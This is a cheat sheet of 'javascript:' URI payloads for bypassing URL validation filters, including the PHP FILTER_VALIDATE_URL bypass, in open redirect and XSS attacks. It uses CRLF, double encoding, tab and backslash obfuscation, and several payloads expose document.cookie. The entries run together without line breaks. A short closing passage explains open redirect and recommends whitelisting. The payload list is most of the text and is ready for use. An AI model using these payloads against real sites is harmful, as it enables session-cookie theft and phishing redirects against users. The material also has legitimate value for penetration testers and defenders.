#Basic payload, javascript code is executed after "javascript:"javascript:alert(1)#Bypass "javascript" word filter with CRLFjava%0d%0ascript%0d%0a:alert(0)#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL os PHPjavascript://%250Aalert(1)#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)javascript://%250Aalert(1)//?1javascript://%250A1?alert(1):0#Others%09Jav%09ascript:alert(document.domain)javascript://%250Alert(document.location=document.cookie)/%09/javascript:alert(1);/%09/javascript:alert(1)//%5cjavascript:alert(1);//%5cjavascript:alert(1)/%5cjavascript:alert(1);/%5cjavascript:alert(1)javascript://%0aalert(1)<>javascript:alert(1);//javascript:alert(1);//javascript:alert(1)/javascript:alert(1);/javascript:alert(1)\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)javascript:alert(1);javascript:alert(1)javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)javascript:confirm(1)javascript://https://whitelisted.com/?z=%0Aalert(1)javascript:prompt(1)jaVAscript://whitelisted.com//%0d%0aalert(1);//javascript://whitelisted.com?%a0alert%281%29/x:1/:///%01javascript:alert(document.cookie)/";alert(0);//
An open redirect vulnerability in a PHP application allows an attacker to redirect users to malicious websites. This can be exploited by crafting a malicious URL that redirects users to a phishing page or a malware-infected site.
To prevent open redirect vulnerabilities in PHP, always validate and sanitize user input, especially when dealing with URL parameters. Whitelist allowed domains and only redirect users to URLs within the whitelist.